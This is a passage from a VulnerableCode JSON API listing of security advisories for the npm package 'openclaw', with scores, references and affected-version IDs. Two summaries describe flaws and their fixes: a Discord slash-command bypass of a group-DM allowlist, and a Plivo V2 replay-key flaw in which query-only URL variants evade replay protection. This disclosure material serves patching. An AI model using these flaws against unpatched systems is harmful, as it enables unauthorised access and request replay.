"VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.2" } ], "aliases": [ "CVE-2026-41295", "GHSA-2qrv-rc5x-2g2h" ], "risk_score": 3.9, "exploitability": "0.5", "weighted_severity": "7.7", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-una1-gxkk-t3bp" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89664?format=api", "vulnerability_id": "VCID-uy97-p1ex-y7df", "summary": "OpenClaw: Discord Slash Commands Bypass Group DM Channel Allowlist\n## Summary\nDiscord Slash Commands Bypass Group DM Channel Allowlist\n\n## Current Maintainer Triage\n- Status: narrow\n- Normalized severity: moderate\n- Assessment: v2026.3.28 native Discord slash and autocomplete paths still skip the group-DM allowlist, but impact is limited to already-authorized Discord users bypassing a channel restriction rather than crossing a stronger trust boundary.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `8fdb19676ab44cf85d47ee13c578195f2e527591` — 2026-03-30T11:17:36-06:00\n\nOpenClaw thanks @nexrin for reporting.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41348", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00034", "scoring_system": "epss", "scoring_elements": "0.10417", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00034", "scoring_system": "epss", "scoring_elements": "0.10395", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00034", "scoring_system": "epss", "scoring_elements": "0.10436", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41348" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" }, { "value": "2.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/8fdb19676ab44cf85d47ee13c578195f2e527591", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" }, { "value": "2.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/commit/8fdb19676ab44cf85d47ee13c578195f2e527591" }, { "reference_url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" }, { "value": "2.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-rvvf-6vh3-9j43", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" }, { "value": "LOW", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "2.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-rvvf-6vh3-9j43" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41348", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" }, { "value": "2.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41348" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-group-dm-channel-allowlist-bypass-via-discord-slash-commands", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" }, { "value": "2.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://www.vulncheck.com/advisories/openclaw-group-dm-channel-allowlist-bypass-via-discord-slash-commands" }, { "reference_url": "https://github.com/advisories/GHSA-rvvf-6vh3-9j43", "reference_id": "GHSA-rvvf-6vh3-9j43", "reference_type": "", "scores": [ { "value": "LOW", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-rvvf-6vh3-9j43" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109907?format=api", "purl": "pkg:npm/openclaw@2026.3.31", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-pj41-sunw-vbcj" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31" } ], "aliases": [ "CVE-2026-41348", "GHSA-rvvf-6vh3-9j43" ], "risk_score": 2.5, "exploitability": "0.5", "weighted_severity": "4.9", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-uy97-p1ex-y7df" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91856?format=api", "vulnerability_id": "VCID-v1bp-hw9a-yffz", "summary": "OpenClaw: Plivo V2 verified replay identity drifts on query-only variants\n## Summary\nBefore `v2026.3.23`, the Plivo V2 verification path treated query-only variants of the same signed request as fresh verified work. Plivo V2 signatures authenticate `baseUrl + nonce`, but the replay key was derived from the full verification URL including the query string, so unsigned query-only changes minted a new `verifiedRequestKey`.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Affected: `< 2026.3.23`\n- Fixed: `>= 2026.3.23`\n- Latest released tag checked: `v2026.3.23-2` (`630f1479c44f78484dfa21bb407cbe6f171dac87`)\n- Latest published npm version checked: `2026.3.23-2`\n\n## Root Cause\nThe vulnerable logic lived in `extensions/voice-call/src/webhook-security.ts`. V2 signature validation already canonicalized to the base URL without query parameters, but the replay key used the full `verificationUrl`, letting query-only variants bypass replay identity stability.\n\n## Fix Commit(s)\n- `b0ce53a79cf63834660270513e26d921899b4e5b` — `fix(voice-call): stabilize plivo v2 replay keys`\n\n## Release Status\nThe fix commit is contained in released tags `v2026.3.23` and `v2026.3.23-2`. The latest shipped tag and npm release both include the fix.\n\n## Code-Level Confirmation\n- `extensions/voice-call/src/webhook-security.ts` now derives the V2 replay key with `createPlivoV2ReplayKey(...)`, which hashes `getBaseUrlNoQuery(url)` plus the nonce.\n- `extensions/voice-call/src/webhook-security.test.ts` contains the regression test `treats query-only V2 variants as the same verified request`.\n\nThanks @smaeljaish771 for reporting.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35618", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00042", "scoring_system": "epss", "scoring_elements": "0.133", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00042", "scoring_system": "epss", "scoring_elements": "0.13342", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00042", "scoring_system": "epss", "scoring_elements": "0.13338", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35618" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:N" }, { "value": "8.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "8.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T12:33:06Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/b0ce53a79cf63834660270513e26d921899b4e5b", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:N" }, { "value": "8.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "8.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T12:33:06Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/b0ce53a79cf63834660270513e26d921899b4e5b" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-cg6c-q2hx-69h7", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:N" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "8.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "8.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T12:33:06Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-cg6c-q2hx-69h7" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35618", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35618" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-replay-identity-drift-via-query-only-variants-in-plivo-v2-verification", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:N" }, { "value": "8.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "8.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T12:33:06Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-replay-identity-drift-via-query-only-variants-in-plivo-v2-verification" }, { "reference_url": "https://github.com/advisories/GHSA-cg6c-q2hx-69h7", "reference_id": "GHSA-cg6c-q2hx-69h7", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-cg6c-q2hx-69h7" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/110761?format=api", "purl": "pkg:npm/openclaw@2026.3.23", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1j3m-fecr-f7cn" }, { "vulnerability": "VCID-1p3b-pfnn-x7ad" }, { "vulnerability": "VCID-1p5p-eth5-3ufu" }, { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-1smq-mbty-jkaj" }, { "vulnerability": "VCID-24m7-jx1g-hqde" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-26kp-dbu2-pqej" }, { "vulnerability": "VCID-26sg-e29u-hkf3" }, { "vulnerability": "VCID-26sv-grsd-abcw" }, { "vulnerability": "VCID-294z-6z8j-97bx" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2hca-3v8f-f3e8" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-2uqu-k42d-1baq" }, { "vulnerability": "VCID-2v8n-mnws-jfc9" }, { "vulnerability": "VCID-2wr9-h42m-a7ev" }, { "vulnerability": "VCID-32zs-2zs9-uufs" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-37ep-9smd-zuh9" }, { "vulnerability": "VCID-384t-z1h8-pfft" }, { "vulnerability": "VCID-38g8-39ek-xbat" }, { "vulnerability": "VCID-3bdd-a9nw-13bn" }, { "vulnerability": "VCID-3wsw-d4z2-dydt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-3zx4-t8cj-kbfn" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4hz5-f2pw-3yb4" }, { "vulnerability": "VCID-4jwj-6s5z-wbeq" }, { "vulnerability": "VCID-4nwq-14y4-xkhp" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4uqc-3h1c-4yhs" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-5atj-2a7b-57g5" }, { "vulnerability": "VCID-5rgx-2krs-guck" }, { "vulnerability": "VCID-6849-th74-yqd5" }, { "vulnerability": "VCID-6bxd-kbse-sudx" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7dyw-9b37-yqh4" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7wmr-v7zb-6fc9" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-8uzb-xmf8-hbca" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9jjv-aa8k-rke1" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9pj9-7b12-jbea" }, { "vulnerability": "VCID-9uyu-y9qv-u7e1" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-9xrt-mv81-3yc8" }, { "vulnerability": "VCID-9yxw-fj1c-tff9" }, { "vulnerability": "VCID-a2p8-ydn6-3bbr" }, { "vulnerability": "VCID-a2wx-7b8h-c3h1" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-atn7-pn13-3fgb" }, { "vulnerability": "VCID-axp9-mt9z-gkgw" }, { "vulnerability": "VCID-aye6-1fwu-nkc5" }, { "vulnerability": "VCID-b9w3-w2nq-cqg6" }, { "vulnerability": "VCID-bg1d-gmxy-wkc6" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bk76-1ctt-tkaw" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-bnfh-rsk9-cfea" }, { "vulnerability": "VCID-brfj-4shr-qkgc" }, { "vulnerability": "VCID-bumq-54sb-6ua7" }, { "vulnerability": "VCID-bzw7-yvu2-yqa2" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-c4yt-z48z-zygv" }, { "vulnerability": "VCID-c76v-4577-n7c6" }, { "vulnerability": "VCID-carm-gpgh-wbbf" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-csnc-r6fv-j3en" }, { "vulnerability": "VCID-cvmw-sxfq-dyhz" }, { "vulnerability": "VCID-cvxu-rdbu-abd2" }, { "vulnerability": "VCID-cwd3-ecym-sfaw" }, { "vulnerability": "VCID-d3qp-5wm9-aqfp" }, { "vulnerability": "VCID-d864-qy75-c3dx" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-da47-zdf1-mfgf" }, { "vulnerability": "VCID-dbcw-brhj-k7hs" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-djqx-bwuu-4uc1" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fekn-d6f3-xfa6" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-g3hg-peh1-tudm" }, { "vulnerability": "VCID-g8r6-x6s5-uydq" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-gvam-2net-8kc5" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hd4w-s3dp-nubj" }, { "vulnerability": "VCID-hkqd-6khg-m3hj" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-j8fb-fhyc-33fu" }, { "vulnerability": "VCID-j92n-5217-9bhj" }, { "vulnerability": "VCID-j96c-kau3-7fag" }, { "vulnerability": "VCID-jbwa-scg3-efeq" }, { "vulnerability": "VCID-jdqk-kv8u-xqa9" }, { "vulnerability": "VCID-jhah-j2td-t3dp" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k3up-1vdf-2uh9" }, { "vulnerability": "VCID-k52b-966p-ybbk" }, { "vulnerability": "VCID-k5da-7tht-w3bs" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kzgh-7f6h-kfd1" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mcz5-wgu1-z7g7" }, { "vulnerability": "VCID-mggy-bv5s-5uax" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nfva-pukn-uqch" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7me-4bzz-83cm" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pa1f-qzsh-efa9" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pc9z-x5wk-8ue7" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-q9jf-srt4-fbcg" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-qjvc-etb4-qbfv" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-r9y1-z2ax-z3e2" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-s3wz-3yzf-ybhz" }, { "vulnerability": "VCID-sja9-6t41-hud8" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-t991-75e7-ykdv" }, { "vulnerability": "VCID-te8f-snty-j7hh" }, { "vulnerability": "VCID-tf28-1z2z-5yfn" }, { "vulnerability": "VCID-tk9h-nqrz-uugp" }, { "vulnerability": "VCID-u1ru-vdfp-x3hu" }, { "vulnerability": "VCID-u6hw-ffpj-4yd9" }, { "vulnerability": "VCID-u9cw-crg5-1kbs" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-uy97-p1ex-y7df" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vktg-77tu-vycv" }, { "vulnerability": "VCID-vm8g-hrvu-quhm" }, { "vulnerability": "VCID-vqrj-z6tx-rff2" }, { "vulnerability": "VCID-vtqt-bgz7-yub6" }, { "vulnerability": "VCID-vx5d-3d98-7kf3" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2rd-2j4p-gfgw" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { 